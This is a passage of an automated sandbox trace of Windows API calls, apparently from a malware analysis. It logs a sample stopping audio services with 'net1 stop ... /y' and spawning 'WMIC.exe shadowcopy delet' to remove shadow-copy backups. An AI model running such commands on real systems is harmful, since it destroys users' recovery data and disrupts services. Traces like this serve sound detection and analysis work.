(hSCManager=0x2fb0878, lpServiceName="AUDIOENDPOINTBUILDER", dwDesiredAccess=0xc) returned 0x2fb05a8 [0147.766] QueryServiceStatus (in: hService=0x2fb05a8, lpServiceStatus=0x2ebf768 | out: lpServiceStatus=0x2ebf768*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0xc1, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0147.766] EnumDependentServicesW (in: hService=0x2fb05a8, dwServiceState=0x1, lpServices=0x2fb1ff0, cbBufSize=0xfa0, pcbBytesNeeded=0x2ebf75c, lpServicesReturned=0x2ebf760 | out: lpServices=0x2fb1ff0*(lpServiceName="Audiosrv", lpDisplayName="Windows Audio", ServiceStatus.dwServiceType=0x10, ServiceStatus.dwCurrentState=0x4, ServiceStatus.dwControlsAccepted=0xc1, ServiceStatus.dwWin32ExitCode=0x0, ServiceStatus.dwServiceSpecificExitCode=0x0, ServiceStatus.dwCheckPoint=0x0, ServiceStatus.dwWaitHint=0x0), pcbBytesNeeded=0x2ebf75c, lpServicesReturned=0x2ebf760) returned 1 [0147.767] GetServiceDisplayNameW (in: hSCManager=0x2fb0878, lpServiceName="AUDIOENDPOINTBUILDER", lpDisplayName=0x2c7820, lpcchBuffer=0x2ebf744 | out: lpDisplayName="Windows Audio Endpoint Builder", lpcchBuffer=0x2ebf744) returned 1 [0147.768] wcscpy_s (in: _Destination=0x2c7610, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0147.768] LoadLibraryExW (lpLibFileName="NETMSG", hFile=0x0, dwFlags=0x20) returned 0x2f00002 [0147.768] FormatMessageW (in: dwFlags=0x2800, lpSource=0x2f00002, dwMessageId=0xdca, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The following services are dependent on the Windows Audio Endpoint Builder service.\r\nStopping the Windows Audio Endpoint Builder service will also stop these services.\r\n") returned 0xa9 [0147.769] GetFileType (hFile=0x90) returned 0x2 [0147.769] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x2ebf708 | out: lpMode=0x2ebf708) returned 1 [0148.743] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0xa9, lpNumberOfCharsWritten=0x2ebf714, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x2ebf714*=0xa9) returned 1 [0149.228] GetFileType (hFile=0x90) returned 0x2 [0149.228] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x2ebf708 | out: lpMode=0x2ebf708) returned 1 [0149.680] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ebf714, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x2ebf714*=0x2) returned 1 [0150.215] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format=" %Fws", _ArgList=0x2ebf74c | out: _Buffer=" Windows Audio") returned 16 [0150.215] GetFileType (hFile=0x90) returned 0x2 [0150.215] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x2ebf738 | out: lpMode=0x2ebf738) returned 1 [0150.854] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x2ebf73c, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x2ebf73c*=0x10) returned 1 [0151.155] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x2ebf744 | out: _Buffer="\r\n") returned 2 [0151.155] GetFileType (hFile=0x90) returned 0x2 [0151.155] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x2ebf730 | out: lpMode=0x2ebf730) returned 1 [0151.461] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ebf734, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x2ebf734*=0x2) returned 1 [0151.687] _vsnwprintf_s (in: _Buffer=0x2c1f80, _BufferCount=0x1001, _MaxCount=0x1000, _Format="\r\n", _ArgList=0x2ebf74c | out: _Buffer="\r\n") returned 2 [0151.687] GetFileType (hFile=0x90) returned 0x2 [0151.687] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x2ebf738 | out: lpMode=0x2ebf738) returned 1 [0151.913] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c1f80*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ebf73c, lpReserved=0x0 | out: lpBuffer=0x2c1f80*, lpNumberOfCharsWritten=0x2ebf73c*=0x2) returned 1 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0152.196] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0152.197] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0152.197] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2fb08a0 [0152.197] OpenServiceW (hSCManager=0x2fb08a0, lpServiceName="Audiosrv", dwDesiredAccess=0x84) returned 0x2fb08c8 [0152.197] ControlService (in: hService=0x2fb08c8, dwControl=0x4, lpServiceStatus=0x2ebf6d8 | out: lpServiceStatus=0x2ebf6d8*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x3, dwWaitHint=0x1388)) returned 0 [0152.197] GetLastError () returned 0x425 [0152.198] QueryServiceStatus (in: hService=0x2fb08c8, lpServiceStatus=0x2ebf6d8 | out: lpServiceStatus=0x2ebf6d8*(dwServiceType=0x10, dwCurrentState=0x3, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x3, dwWaitHint=0x1388)) returned 1 [0152.198] LocalAlloc (uFlags=0x40, uBytes=0x2e) returned 0x2fa88c8 [0152.198] wcscpy_s (in: _Destination=0x2fa88e4, _SizeInWords=0x9, _Source="Audiosrv" | out: _Destination="Audiosrv") returned 0x0 [0152.198] CloseServiceHandle (hSCObject=0x2fb08a0) returned 1 [0152.198] CloseServiceHandle (hSCObject=0x2fb08c8) returned 1 [0152.198] NetApiBufferAllocate (in: ByteCount=0x1e0, Buffer=0x2ebf6bc | out: Buffer=0x2ebf6bc*=0x2fb49a8) returned 0x0 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="WORKSTATION") returned -22 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="LanmanWorkstation") returned -11 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="SERVER") returned -18 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="LanmanServer") returned -11 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="BROWSER") returned -1 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="MESSENGER") returned -12 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="NETRUN") returned -13 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="SPOOLER") returned -18 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="ALERTER") returned 9 [0152.198] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="NETLOGON") returned -13 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="NETPOPUP") returned -13 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="SQLSERVER") returned -18 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="REPLICATOR") returned -17 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="REMOTEBOOT") returned -17 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="TIMESOURCE") returned -19 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="AFP") returned 15 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="UPS") returned -20 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="XACTSRV") returned -23 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0152.199] _wcsicmp (_String1="Audiosrv", _String2="TCPIP") returned -19 [0152.199] wcsncpy_s (in: _Destination=0x2fb4b76, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0152.199] wcsncpy_s (in: _Destination=0x2fb4b64, _SizeInWords=0x9, _Source="Audiosrv", _MaxCount=0x8 | out: _Destination="Audiosrv") returned 0x0 [0152.199] NetApiBufferFree (Buffer=0x2fa88c8) returned 0x0 [0152.199] GetServiceDisplayNameW (in: hSCManager=0x2fb0878, lpServiceName="Audiosrv", lpDisplayName=0x2c7820, lpcchBuffer=0x2ebf6c8 | out: lpDisplayName="Windows Audio", lpcchBuffer=0x2ebf6c8) returned 1 [0152.199] FormatMessageW (in: dwFlags=0x2800, lpSource=0x2f00002, dwMessageId=0xdcd, dwLanguageId=0x0, lpBuffer=0x2c7c20, nSize=0x800, Arguments=0x2c73d0 | out: lpBuffer="The service is starting or stopping. Please try again later.\r\n") returned 0x3f [0152.199] GetFileType (hFile=0x90) returned 0x2 [0152.200] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x2ebf68c | out: lpMode=0x2ebf68c) returned 1 [0152.491] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2c7c20*, nNumberOfCharsToWrite=0x3f, lpNumberOfCharsWritten=0x2ebf698, lpReserved=0x0 | out: lpBuffer=0x2c7c20*, lpNumberOfCharsWritten=0x2ebf698*=0x3f) returned 1 [0152.913] GetFileType (hFile=0x90) returned 0x2 [0152.913] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x2ebf68c | out: lpMode=0x2ebf68c) returned 1 [0153.374] WriteConsoleW (in: hConsoleOutput=0x90, lpBuffer=0x2a12e4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2ebf698, lpReserved=0x0 | out: lpBuffer=0x2a12e4*, lpNumberOfCharsWritten=0x2ebf698*=0x2) returned 1 [0153.853] NetApiBufferFree (Buffer=0x2fa7d48) returned 0x0 [0153.853] NetApiBufferFree (Buffer=0x2fa7d60) returned 0x0 [0153.853] GetCommandLineW () returned="C:\\WINDOWS\\system32\\net1 stop \"audioendpointbuilder\" /y" [0153.853] exit (_Code=2) Thread: id = 565 os_tid = 0x1830 Process: id = "29" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x1ef22000" os_pid = "0x1834" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xd4c" cmd_line = "WMIC.exe shadowcopy delet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 566 os_tid = 0x1838 [0148.792] GetModuleHandleA (lpModuleName=0x0) returned 0xe60000 [0148.792] __set_app_type (_Type=0x1) [0148.792] __p__fmode () returned 0x76953c14 [0148.792] __p__commode () returned 0x769549ec [0148.792] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe99af0) returned 0x0 [0148.792] __wgetmainargs (in: _Argc=0xea81a8, _Argv=0xea81ac, _Env=0xea81b0, _DoWildCard=0, _StartInfo=0xea81bc | out: _Argc=0xea81a8, _Argv=0xea81ac, _Env=0xea81b0) returned 0 [0148.793] ??0CHString@@QAE@XZ () returned 0xea85ec [0148.793] malloc (_Size=0x18) returned 0x880ec8 [0148.793] malloc (_Size=0x38) returned 0x880ee8 [0148.793] malloc (_Size=0x28) returned 0x880f28 [0148.793] malloc (_Size=0x18) returned 0x880f58 [0148.793] malloc (_Size=0x24) returned 0x880f78 [0148.793] malloc (_Size=0x18) returned 0x880fa8 [0148.793] malloc (_Size=0x18) returned 0x880fc8 [0148.793] ??0CHString@@QAE@XZ () returned 0xea88fc [0148.793] malloc (_Size=0x18) returned 0x880fe8 [0148.793] ?Empty@CHString@@QAEXXZ () returned 0x72c565f8 [0148.793] SetConsoleCtrlHandler (HandlerRoutine=0xe93cc0, Add=1) returned 1 [0148.793] _onexit (_Func=0xe9f370) returned 0xe9f370 [0148.793] _onexit (_Func=0xe9f380) returned 0xe9f380 [0148.794] _onexit (_Func=0xe9f390) returned 0xe9f390 [0148.794] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0148.794] ResolveDelayLoadedAPI () returned 0x74772590 [0148.794] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0148.963] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0160.719] CoCreateInstance (in: rclsid=0xe66a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xe66a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xea8510 | out: ppv=0xea8510*=0x9f2e50) returned 0x0 [0161.049] GetCurrentProcess () returned 0xffffffff [0161.049] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x69fb80 | out: TokenHandle=0x69fb80*=0x1a0) returned 1 [0161.049] GetTokenInformation (in: TokenHandle=0x1a0, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x69fb7c | out: TokenInformation=0x0, ReturnLength=0x69fb7c) returned 0 [0161.049] malloc (_Size=0x118) returned 0x882588 [0161.049] GetTokenInformation (in: TokenHandle=0x1a0, TokenInformationClass=0x3, TokenInformation=0x882588, TokenInformationLength=0x118, ReturnLength=0x69fb7c | out: TokenInformation=0x882588, ReturnLength=0x69fb7c) returned 1 [0161.050] AdjustTokenPrivileges (in: TokenHandle=0x1a0, DisableAllPrivileges=0, NewState=0x882588*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0161.050] free (_Block=0x882588) [0161.050] CloseHandle (hObject=0x1a0) returned 1 [0161.050] malloc (_Size=0x40) returned 0x882588 [0161.050] malloc (_Size=0x40) returned 0x8825d0 [0161.050] malloc (_Size=0x40) returned 0x882618 [0161.050] SetThreadUILanguage (LangId=0x0) returned 0x4c0409 [0161.590] _vsnwprintf (in: _Buffer=0x882618, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x69fb08 | out: _Buffer="ms_409") returned 6 [0161.590] malloc (_Size=0x20) returned 0x882660 [0161.590] GetComputerNameW (in: lpBuffer=0x882660, nSize=0x69fb6c | out: lpBuffer="NQDPDE", nSize=0x69fb6c) returned 1 [0161.590] lstrlenW (lpString="NQDPDE") returned 6 [0161.590] malloc (_Size=0xe) returned 0x882688 [0161.590] lstrlenW (lpString="NQDPDE") returned 6 [0161.590] ResolveDelayLoadedAPI () returned 0x73e6db00 [0161.591] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x69fb80 | out: lpNameBuffer=0x0, nSize=0x69fb80) returned 0x4ca000 [0161.592] GetLastError () returned 0xea [0161.592] malloc (_Size=0x1e) returned 0x8826a0 [0161.592] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x8826a0, nSize=0x69fb80 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x69fb80) returned 0x1 [0161.592] lstrlenW (lpString="") returned 0 [0161.593] lstrlenW (lpString="NQDPDE") returned 6 [0161.593] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0161.594] lstrlenW (lpString=".") returned 1 [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0161.594] lstrlenW (lpString="LOCALHOST") returned 9 [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0161.594] free (_Block=0x882688) [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] malloc (_Size=0xe) returned 0x882688 [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] malloc (_Size=0xe) returned 0x8826c8 [0161.594] lstrlenW (lpString="NQDPDE") returned 6 [0161.594] malloc (_Size=0x4) returned 0x8826e0 [0161.594] malloc (_Size=0xc) returned 0x8826f0 [0161.594] ResolveDelayLoadedAPI () returned 0x73e9b870 [0161.602] malloc (_Size=0x18) returned 0x882708 [0161.602] malloc (_Size=0xc) returned 0x882728 [0161.602] SysStringLen (param_1="IDENTIFY") returned 0x8 [0161.602] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0161.602] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0161.602] SysStringLen (param_1="IDENTIFY") returned 0x8 [0161.602] malloc (_Size=0x18) returned 0x882740 [0161.602] malloc (_Size=0xc) returned 0x882760 [0161.602] SysStringLen (param_1="IMPERSONATE") returned 0xb [0161.602] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0161.602] SysStringLen (param_1="IMPERSONATE") returned 0xb [0161.602] SysStringLen (param_1="IDENTIFY") returned 0x8 [0161.602] SysStringLen (param_1="IDENTIFY") returned 0x8 [0161.602] SysStringLen (param_1="IMPERSONATE") returned 0xb [0161.602] malloc (_Size=0x18) returned 0x882778 [0161.602] malloc (_Size=0xc) returned 0x882798 [0161.602] SysStringLen (param_1="DELEGATE") returned 0x8 [0161.602] SysStringLen (param_1="IDENTIFY") returned 0x8 [0161.602] SysStringLen (param_1="DELEGATE") returned 0x8 [0161.602] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0161.602] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0161.602] SysStringLen (param_1="DELEGATE") returned 0x8 [0161.602] malloc (_Size=0x18) returned 0x8827b0 [0161.602] malloc (_Size=0xc) returned 0x8827d0 [0161.602] malloc (_Size=0x18) returned 0x8827e8 [0161.602] malloc (_Size=0xc) returned 0x882808 [0161.602] SysStringLen (param_1="NONE") returned 0x4 [0161.602] SysStringLen (param_1="DEFAULT") returned 0x7 [0161.602] SysStringLen (param_1="DEFAULT") returned 0x7 [0161.602] SysStringLen (param_1="NONE") returned 0x4 [0161.603] malloc (_Size=0x18) returned 0x882820 [0161.603] malloc (_Size=0xc) returned 0x882840 [0161.603] SysStringLen (param_1="CONNECT") returned 0x7 [0161.603] SysStringLen (param_1="DEFAULT") returned 0x7 [0161.603] malloc (_Size=0x18) returned 0x882858 [0161.603] malloc (_Size=0xc) returned 0x8804a0 [0161.603] SysStringLen (param_1="CALL") returned 0x4 [0161.603] SysStringLen (param_1="DEFAULT") returned 0x7 [0161.603] SysStringLen (param_1="CALL") returned 0x4 [0161.603] SysStringLen (param_1="CONNECT") returned 0x7 [0161.603] malloc (_Size=0x18) returned 0x8804b8 [0161.603] malloc (_Size=0xc) returned 0x8804d8 [0161.603] SysStringLen (param_1="PKT") returned 0x3 [0161.603] SysStringLen (param_1="DEFAULT") returned 0x7 [0161.603] SysStringLen (param_1="PKT") returned 0x3 [0161.603] SysStringLen (param_1="NONE") returned 0x4 [0161.603] SysStringLen (param_1="NONE") returned 0x4 [0161.603] SysStringLen (param_1="PKT") returned 0x3 [0161.603] malloc (_Size=0x18) returned 0x882960 [0161.603] malloc (_Size=0xc) returned 0x8804f0 [0161.604] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0161.604] SysStringLen (param_1="DEFAULT") returned 0x7 [0161.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0161.955] SysStringLen (param_1="NONE") returned 0x4 [0161.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0161.955] SysStringLen (param_1="PKT") returned 0x3 [0161.955] SysStringLen (param_1="PKT") returned 0x3 [0161.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0161.955] malloc (_Size=0x18) returned 0x882be0 [0161.955] malloc (_Size=0xc) returned 0x880508 [0161.955] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0161.955] SysStringLen (param_1="DEFAULT") returned 0x7 [0161.955] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0161.955] SysStringLen (param_1="PKT") returned 0x3 [0161.955] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0161.956] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0161.956] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0161.956] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0161.956] malloc (_Size=0x18) returned 0x882bc0 [0161.956] malloc (_Size=0x40) returned 0x880520 [0161.956] malloc (_Size=0x20a) returned 0x889568 [0161.956] GetSystemDirectoryW (in: lpBuffer=0x889568, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0161.956] free (_Block=0x889568) [0161.956] malloc (_Size=0xc) returned 0x880568 [0161.956] malloc (_Size=0xc) returned 0x880580 [0161.956] malloc (_Size=0xc) returned 0x882c80 [0161.956] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0161.956] SysStringLen (param_1="\\wbem\\") returned 0x6 [0161.956] free (_Block=0x880568) [0161.956] free (_Block=0x880580) [0161.956] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0161.956] free (_Block=0x882c80) [0161.956] malloc (_Size=0xc) returned 0x8895c0 [0161.956] malloc (_Size=0xc) returned 0x8896c8 [0161.956] malloc (_Size=0xc) returned 0x889680 [0161.956] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0161.956] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0161.957] free (_Block=0x8895c0) [0161.957] free (_Block=0x8896c8) [0161.957] GetCurrentThreadId () returned 0x1838 [0161.957] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x69f690 | out: phkResult=0x69f690*=0x1ac) returned 0x0 [0161.957] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x69f69c, lpcbData=0x69f698*=0x400 | out: lpType=0x0, lpData=0x69f69c*=0x30, lpcbData=0x69f698*=0x4) returned 0x0 [0161.957] _wcsicmp (_String1="0", _String2="1") returned -1 [0161.957] _wcsicmp (_String1="0", _String2="2") returned -2 [0161.957] RegQueryValueExW (in: hKey=0x1ac, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x69f698*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x69f698*=0x42) returned 0x0 [0161.957] malloc (_Size=0x86) returned 0x882c80 [0161.957] RegQueryValueExW (in: 